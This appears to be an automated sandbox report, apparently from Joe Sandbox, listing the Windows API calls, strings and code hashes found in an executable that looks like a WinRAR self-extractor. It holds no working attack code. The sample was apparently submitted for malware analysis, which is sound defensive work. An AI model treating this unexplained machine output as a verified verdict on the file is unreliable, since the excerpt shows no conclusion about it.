                                        • _free.LIBCMT ref: 002F9844
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F9851
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F985D
                                        • _abort.LIBCMT ref: 002F9863
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002EDC47
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EDC61
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EDC72
                                        • TranslateMessage.USER32(?), ref: 002EDC7C
                                        • DispatchMessageW.USER32(?), ref: 002EDC86
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002EDC91
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        APIs
                                          • Part of subcall function 002EA699: GetDC.USER32(00000000), ref: 002EA69D
                                          • Part of subcall function 002EA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 002EA6A8
                                          • Part of subcall function 002EA699: ReleaseDC.USER32(00000000,00000000), ref: 002EA6B3
                                        • GetObjectW.GDI32(?,00000018,?), ref: 002EA83C
                                          • Part of subcall function 002EAAC9: GetDC.USER32(00000000), ref: 002EAAD2
                                          • Part of subcall function 002EAAC9: GetObjectW.GDI32(?,00000018,?), ref: 002EAB01
                                          • Part of subcall function 002EAAC9: ReleaseDC.USER32(00000000,?), ref: 002EAB99
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: ".$($A.
                                        • API String ID: 1061551593-2927423407
                                        APIs
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                          • Part of subcall function 002DB92D: _wcsrchr.LIBVCRUNTIME ref: 002DB944
                                        • _wcslen.LIBCMT ref: 002DC197
                                        • _wcslen.LIBCMT ref: 002DC1DF
                                        Similarity
                                        • API ID: _wcslen$_wcsrchr
                                        • String ID: .exe$.rar$.sfx
                                        • API String ID: 3513545583-31770016
                                        APIs
                                        • _wcslen.LIBCMT ref: 002DBB27
                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,002DA275,?,?,00000800,?,002DA23A,?,002D755C), ref: 002DBBC5
                                        • _wcslen.LIBCMT ref: 002DBC3B
                                        Similarity
                                        • API ID: _wcslen$CurrentDirectory
                                        • String ID: UNC$\\?\
                                        • API String ID: 3341907918-253988292
                                        APIs
                                        • _wcschr.LIBVCRUNTIME ref: 002ECD84
                                          • Part of subcall function 002EAF98: _wcschr.LIBVCRUNTIME ref: 002EB033
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        Similarity
                                        • API ID: _wcschr$CompareString
                                        • String ID: <$HIDE$MAX$MIN
                                        • API String ID: 69343711-3358265660
                                        APIs
                                        • GetDC.USER32(00000000), ref: 002EAAD2
                                        • GetObjectW.GDI32(?,00000018,?), ref: 002EAB01
                                        • ReleaseDC.USER32(00000000,?), ref: 002EAB99
                                        Similarity
                                        • API ID: ObjectRelease
                                        • String ID: -.$7.
                                        APIs
                                        • _swprintf.LIBCMT ref: 002DB9B8
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • _wcschr.LIBVCRUNTIME ref: 002DB9D6
                                        • _wcschr.LIBVCRUNTIME ref: 002DB9E6
                                        Similarity
                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                        • String ID: %c:\
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002EB2BE
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 002EB2D6
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 002EB304
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: GETPASSWORD1$xz2
                                        APIs
                                        • LoadBitmapW.USER32(00000065), ref: 002EB6ED
                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 002EB712
                                        • DeleteObject.GDI32(00000000), ref: 002EB744
                                        • DeleteObject.GDI32(00000000), ref: 002EB767
                                          • Part of subcall function 002EA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,002EB73D,00000066), ref: 002EA6D5
                                          • Part of subcall function 002EA6C2: SizeofResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA6EC
                                          • Part of subcall function 002EA6C2: LoadResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA703
                                          • Part of subcall function 002EA6C2: LockResource.KERNEL32(00000000,?,?,?,002EB73D,00000066), ref: 002EA712
                                          • Part of subcall function 002EA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,002EB73D,00000066), ref: 002EA72D
                                          • Part of subcall function 002EA6C2: GlobalLock.KERNEL32(00000000), ref: 002EA73E
                                          • Part of subcall function 002EA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 002EA762
                                          • Part of subcall function 002EA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002EA7A7
                                          • Part of subcall function 002EA6C2: GlobalUnlock.KERNEL32(00000000), ref: 002EA7C6
                                          • Part of subcall function 002EA6C2: GlobalFree.KERNEL32(00000000), ref: 002EA7CD
                                        Similarity
                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                        • String ID: ]
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002ED64B
                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 002ED661
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 002ED675
                                        • SetDlgItemTextW.USER32(?,00000068), ref: 002ED684
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: RENAMEDLG
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002F7E24,00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002), ref: 002F7E93
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002F7EA6
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,002F7E24,00000000,?,002F7DC4,00000000,0030C300,0000000C,002F7F1B,00000000,00000002), ref: 002F7EC9
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        APIs
                                          • Part of subcall function 002E081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002E0836
                                          • Part of subcall function 002E081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,002DF2D8,Crypt32.dll,00000000,002DF35C,?,?,002DF33E,?,?,?), ref: 002E0858
                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 002DF2E4
                                        • GetProcAddress.KERNEL32(003181C8,CryptUnprotectMemory), ref: 002DF2F4
                                        Similarity
                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                        APIs
                                        Similarity
                                        • API ID: AdjustPointer$_abort
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 002FBF39
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002FBF5C
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002FBF82
                                        • _free.LIBCMT ref: 002FBF95
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002FBFA4
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,002F91AD,002FB188,?,002F9813,00000001,00000364,?,002F3F73,00000050,?,00311030,00000200), ref: 002F986E
                                        • _free.LIBCMT ref: 002F98A3
                                        • _free.LIBCMT ref: 002F98CA
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F98D7
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F98E0
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        APIs
                                          • Part of subcall function 002E11CF: ResetEvent.KERNEL32(?), ref: 002E11E1
                                          • Part of subcall function 002E11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002E11F5
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002E0F21
                                        • CloseHandle.KERNEL32(?,?), ref: 002E0F3B
                                        • DeleteCriticalSection.KERNEL32(?), ref: 002E0F54
                                        • CloseHandle.KERNEL32(?), ref: 002E0F60
                                        • CloseHandle.KERNEL32(?), ref: 002E0F6C
                                          • Part of subcall function 002E0FE4: WaitForSingleObject.KERNEL32(?,000000FF,002E1206,?), ref: 002E0FEA
                                          • Part of subcall function 002E0FE4: GetLastError.KERNEL32(?), ref: 002E0FF6
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        APIs
                                        • _free.LIBCMT ref: 002FC817
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002FC829
                                        • _free.LIBCMT ref: 002FC83B
                                        • _free.LIBCMT ref: 002FC84D
                                        • _free.LIBCMT ref: 002FC85F
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: acb03c8c924482404c47cec3f5be44b649a66ca12a2edea2088448ffce4c6823
                                        • Instruction ID: 7cbb533b3551e01222d1be68962e4ea09978fd0faeff543db313a0eb22714940
                                        • Opcode Fuzzy Hash: acb03c8c924482404c47cec3f5be44b649a66ca12a2edea2088448ffce4c6823
                                        • Instruction Fuzzy Hash: 27F0E13262510DABC716EF64E585C26F7EDAE017D4B681C2AF305D7551CA70FC50CA54
                                        APIs
                                        • _wcslen.LIBCMT ref: 002E1FE5
                                        • _wcslen.LIBCMT ref: 002E1FF6
                                        • _wcslen.LIBCMT ref: 002E2006
                                        • _wcslen.LIBCMT ref: 002E2014
                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,002DB371,?,?,00000000,?,?,?), ref: 002E202F
                                        Similarity
                                        • API ID: _wcslen$CompareString
                                        • String ID:
                                        • API String ID: 3397213944-0
                                        • Opcode ID: 3e546f75845cb59cb83abc22608924b32f326605a943618520ae2bebaf52569d
                                        • Instruction ID: 368d5435522d979dc2b2ffd7cc37f507321349e650b6defd457e420f4097cd1e
                                        • Opcode Fuzzy Hash: 3e546f75845cb59cb83abc22608924b32f326605a943618520ae2bebaf52569d
                                        • Instruction Fuzzy Hash: 00F0CD32028018BFDF266F51EC08E8A7F2AEF507A0B108415F61A5A0A1CB729675DA90
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: _swprintf
                                        • String ID: %ls$%s: %s
                                        • API String ID: 589789837-2259941744
                                        • Opcode ID: ed7e953db0aaff80c6cc71f6ca3e7d8138ed1d3f1e93616a6caf655451e24a3e
                                        • Instruction ID: e448f3fc475c5d3b39c10bcb4f6ed660a9b9e5dfad8c6a3415aa0b160f2e11bf
                                        • Opcode Fuzzy Hash: ed7e953db0aaff80c6cc71f6ca3e7d8138ed1d3f1e93616a6caf655451e24a3e
                                        • Instruction Fuzzy Hash: D05111752F83C0F6F6222E928D46F35B25D6B15F04F944537F386684D1C6F29830AB1A
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\7vP2IvNXqx.exe,00000104), ref: 002F7FAE
                                        • _free.LIBCMT ref: 002F8079
                                        • _free.LIBCMT ref: 002F8083
                                        Strings
                                        Similarity
                                        • API ID: _free$FileModuleName
                                        • String ID: C:\Users\user\Desktop\7vP2IvNXqx.exe
                                        • API String ID: 2506810119-2513647909
                                        • Opcode ID: fbe0764b7d5d9a752b40d916eea19e0dc1157ae713aef1627217f855072882b4
                                        • Instruction ID: bf567e54da8c26d02206ebbc89315aa4589d13993d82488d4ca0d3a992543234
                                        • Opcode Fuzzy Hash: fbe0764b7d5d9a752b40d916eea19e0dc1157ae713aef1627217f855072882b4
                                        • Instruction Fuzzy Hash: AB31A071A1021DAFDB22DF95DC81DAEFBBCEF95390F50417AE60497210DAB08A548B61
                                        APIs
                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 002F31FB
                                        • _abort.LIBCMT ref: 002F3306
                                        Strings
                                        Similarity
                                        • API ID: EncodePointer_abort
                                        • String ID: MOC$RCC
                                        • API String ID: 948111806-2084237596
                                        • Opcode ID: 00aa62d442ce48ba3ca47d6976670175812c95b534944a86de7aa937b579c6a6
                                        • Instruction ID: 31224e2677099e4ff997898c1cf8cf46740e7316eaf285859cfa133bbc18bb07
                                        • Opcode Fuzzy Hash: 00aa62d442ce48ba3ca47d6976670175812c95b534944a86de7aa937b579c6a6
                                        • Instruction Fuzzy Hash: 8A414B7191010EAFCF15DF98CD81AEEBBB5BF48344F1480A9FA0467212D3359E60DB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 002D7406
                                          • Part of subcall function 002D3BBA: __EH_prolog.LIBCMT ref: 002D3BBF
                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 002D74CD
                                          • Part of subcall function 002D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 002D7AAB
                                          • Part of subcall function 002D7A9C: GetLastError.KERNEL32 ref: 002D7AF1
                                          • Part of subcall function 002D7A9C: CloseHandle.KERNEL32(?), ref: 002D7B00
                                        Strings
                                        Similarity
                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                        • API String ID: 3813983858-639343689
                                        • Opcode ID: 7a2fbc1b13a9b27fe809db5fe987f60766aee66cab25564e648d864ff37f2182
                                        • Instruction ID: 86349a4cc1173a8947434f7dafed78a7cc49b4eb6187c18e4e6b695ff93ab1f1
                                        • Opcode Fuzzy Hash: 7a2fbc1b13a9b27fe809db5fe987f60766aee66cab25564e648d864ff37f2182
                                        • Instruction Fuzzy Hash: EA31D271D14249AADF12EFA4DC45BEEBBB9AF09304F404017F905A7382D7788E64CB61
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002EAD98
                                        • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 002EADAD
                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 002EADC2
                                        Strings
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: ASKNEXTVOL
                                        • API String ID: 445417207-3402441367
                                        • Opcode ID: db3f20e58c34effafd362ee155fac3024e164f08699924a5cdddc62386cc0d8d
                                        • Instruction ID: 8c39bcd04756c2b793dc602d5f604c4bdde501d7d642e65052e1c316e9da4d85
                                        • Opcode Fuzzy Hash: db3f20e58c34effafd362ee155fac3024e164f08699924a5cdddc62386cc0d8d
                                        • Instruction Fuzzy Hash: 5511B1322E0241BFD7129F699C85FAA376DAB4A702F904001F241DA5A0C7A1A9259B22
                                        APIs
                                        • DialogBoxParamW.USER32(GETPASSWORD1,00010456,002EB270,?,?), ref: 002EDE18
                                        Strings
                                        Similarity
                                        • API ID: DialogParam
                                        • String ID: GETPASSWORD1$r.$xz2
                                        • API String ID: 665744214-66743913
                                        • Opcode ID: c1a5943a42865194623af07a2ad468f04d0c6c319e12569314b2ec4c00747140
                                        • Instruction ID: 45a68471e089f96291bf721b2a7f15b6d63509251bf98b869b5560bd342be955
                                        • Opcode Fuzzy Hash: c1a5943a42865194623af07a2ad468f04d0c6c319e12569314b2ec4c00747140
                                        • Instruction Fuzzy Hash: E5115E326A4284AADB13DE369C45BEF339CAB0E350F548065FD45AB1C1CBB0AC94C764
                                        APIs
                                        • __fprintf_l.LIBCMT ref: 002DD954
                                        • _strncpy.LIBCMT ref: 002DD99A
                                          • Part of subcall function 002E1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00311030,00000200,002DD928,00000000,?,00000050,00311030), ref: 002E1DC4
                                        Strings
                                        Similarity
                                        • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                        • String ID: $%s$@%s
                                        • API String ID: 562999700-834177443
                                        • Opcode ID: d799544ea2368b0b4c95141abf0dc0f5f7623d915b2dea18f505ccbf88edc91d
                                        • Instruction ID: 56b42efd2f4db6f49b59f412d9614bc125f3bb42565babe4bd5619562f016ac3
                                        • Opcode Fuzzy Hash: d799544ea2368b0b4c95141abf0dc0f5f7623d915b2dea18f505ccbf88edc91d
                                        • Instruction Fuzzy Hash: 4921A57256064DAEDF21EEA4CC15FEE7BACAF05300F440423F91096292E372DA68CF51
                                        APIs
                                        • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,002DAC5A,00000008,?,00000000,?,002DD22D,?,00000000), ref: 002E0E85
                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,002DAC5A,00000008,?,00000000,?,002DD22D,?,00000000), ref: 002E0E8F
                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,002DAC5A,00000008,?,00000000,?,002DD22D,?,00000000), ref: 002E0E9F
                                        Strings
                                        • Thread pool initialization failed., xrefs: 002E0EB7
                                        Similarity
                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                        • String ID: Thread pool initialization failed.
                                        • API String ID: 3340455307-2182114853
                                        • Opcode ID: a70fcf741ced737a6079b3dde8e166a917eaffa3b6bd260c6033da7baf9e1608
                                        • Instruction ID: 4bce04f7ec0c6af8774379b4bc3024de2b8c79965d3113fcbe866e574de4e0f7
                                        • Opcode Fuzzy Hash: a70fcf741ced737a6079b3dde8e166a917eaffa3b6bd260c6033da7baf9e1608
                                        • Instruction Fuzzy Hash: FE11BFB16517099FC3214F669CC89A7FBECEB69740F58482FE1CA82201D6B19D918B50
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: Malloc
                                        • String ID: (.$2.$A
                                        • API String ID: 2696272793-1006441014
                                        • Opcode ID: ea4a551b00b2df9e0c89b0a63f27c7cf6c079f4905bf1e012357816f70e70b32
                                        • Instruction ID: fb7d2c078d707a595c26dcc2c64c159e4852e3e562ab01668d746d61d64e0e21
                                        • Opcode Fuzzy Hash: ea4a551b00b2df9e0c89b0a63f27c7cf6c079f4905bf1e012357816f70e70b32
                                        • Instruction Fuzzy Hash: D9011771901229ABCB15CFA4E948AEEBBFCEF09300F10416AE906E7310D7759E50CFA4
                                        Strings
                                        Similarity
                                        • API ID:
                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                        • API String ID: 0-56093855
                                        • Opcode ID: e00d39162b2a43e72bb41649d3edb0599e7d3a42be5c861fde05232705f66ce3
                                        • Instruction ID: c2f91171d7a259639e386b935ba8ab5f83ff2bf09216071b674389205284edf5
                                        • Opcode Fuzzy Hash: e00d39162b2a43e72bb41649d3edb0599e7d3a42be5c861fde05232705f66ce3
                                        • Instruction Fuzzy Hash: AD01B576554286AFD7138F9AFC449D67BADF70C344F508025F905C3230CE309860DBA0
                                        APIs
                                          • Part of subcall function 002DE2E8: _swprintf.LIBCMT ref: 002DE30E
                                          • Part of subcall function 002DE2E8: _strlen.LIBCMT ref: 002DE32F
                                          • Part of subcall function 002DE2E8: SetDlgItemTextW.USER32(?,0030E274,?), ref: 002DE38F
                                          • Part of subcall function 002DE2E8: GetWindowRect.USER32(?,?), ref: 002DE3C9
                                          • Part of subcall function 002DE2E8: GetClientRect.USER32(?,?), ref: 002DE3D5
                                        • GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                        • SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        Strings
                                        Similarity
                                        • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                        • String ID: .$0
                                        • API String ID: 2622349952-1180932613
                                        • Opcode ID: 33a4216f9cf199cce76ebe8ec8febc892389c0c76a8da42b2f07a93599010186
                                        • Instruction ID: c93f26c94f038de606fc8709349aca10c57392dfa5432ef7e8d476fd9dd88f4d
                                        • Opcode Fuzzy Hash: 33a4216f9cf199cce76ebe8ec8febc892389c0c76a8da42b2f07a93599010186
                                        • Instruction Fuzzy Hash: 9CF0AF3052438DBADF562F608C0DBEA3B5CAF04345F048196FD4454BA1CB78CDB0EA10
                                        APIs
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                        • Instruction ID: 2987125c1c3a18246db1889a8ff554666ee2b1be81f2c9e1f1bce5dad07c7407
                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                        • Instruction Fuzzy Hash: C7A1487292038A9FEB26CF18C8917BEFBE5EF55390F24417ED6859B281C23589D1CB50
                                        APIs
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,002D7F69,?,?,?), ref: 002DA3FA
                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,002D7F69,?), ref: 002DA43E
                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,002D7F69,?,?,?,?,?,?,?), ref: 002DA4BF
                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,002D7F69,?,?,?,?,?,?,?,?,?,?), ref: 002DA4C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: File$Create$CloseHandleTime
                                        • String ID:
                                        • API String ID: 2287278272-0
                                        • Opcode ID: 2000689ebfc6d5935bc66aaf1ed831f5cec05e59a7bdbe978a06ec246464c5e3
                                        • Instruction ID: 30d5f90e9f753476987b6884cec40514489ea27f2ffca5621c27bbc39810fe7b
                                        • Opcode Fuzzy Hash: 2000689ebfc6d5935bc66aaf1ed831f5cec05e59a7bdbe978a06ec246464c5e3
                                        • Instruction Fuzzy Hash: 9C41C0312983829AD731DF24DC55FAFBBE9AB85300F04095EB5D1932C0D6B49E58DB53
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002F91E0,?,00000000,?,00000001,?,?,00000001,002F91E0,?), ref: 002FC9D5
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002FCA5E
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,002F6CBE,?), ref: 002FCA70
                                        • __freea.LIBCMT ref: 002FCA79
                                          • Part of subcall function 002F8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002FCA2C,00000000,?,002F6CBE,?,00000008,?,002F91E0,?,?,?), ref: 002F8E38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                        • String ID:
                                        • API String ID: 2652629310-0
                                        • Opcode ID: 829e9c95ab9e2d031dba957b84c6b56beca7dabc043e29657e881e7f7b2d63f7
                                        • Instruction ID: 021647f74109717b169584044d8fb7b9d02d27226cb447bde7e90581d9b22b04
                                        • Opcode Fuzzy Hash: 829e9c95ab9e2d031dba957b84c6b56beca7dabc043e29657e881e7f7b2d63f7
                                        • Instruction Fuzzy Hash: DC31AC72A2020EABDB25DF64CC51DBEBBA9EF41350B244179FD04E6290E735DD60CB90
                                        APIs
                                        • GetDC.USER32(00000000), ref: 002EA666
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 002EA675
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002EA683
                                        • ReleaseDC.USER32(00000000,00000000), ref: 002EA691
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: ff47dca7622c03b96ba50363311ae0537d4bbecf15cce566f140c088baaa7fd1
                                        • Instruction ID: e68f10c72e8d4629c082bc13dc8941a3de874de6c6712488065af94a35f9d96c
                                        • Opcode Fuzzy Hash: ff47dca7622c03b96ba50363311ae0537d4bbecf15cce566f140c088baaa7fd1
                                        • Instruction Fuzzy Hash: 49E0EC31952722A7D6665B61AC8DBCA3E5CAB09B52F418201FA069A190DF6486408BA5
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr
                                        • String ID: .lnk$d.
                                        • API String ID: 2691759472-2041913575
                                        • Opcode ID: 03f188c14bfd6b889d0eb62bb81f9d65ad6f90eedd5a158bef4fbf0adbdb69a0
                                        • Instruction ID: 97cb40263aeda66db8a54a11ff5bb00ad55a4101a2e6d3fffa502d8e769b858e
                                        • Opcode Fuzzy Hash: 03f188c14bfd6b889d0eb62bb81f9d65ad6f90eedd5a158bef4fbf0adbdb69a0
                                        • Instruction Fuzzy Hash: 88A1907286026A9ADF35DBA1CD45EFA73FCAF04300F4881A2F509E7141EE749B958F60
                                        APIs
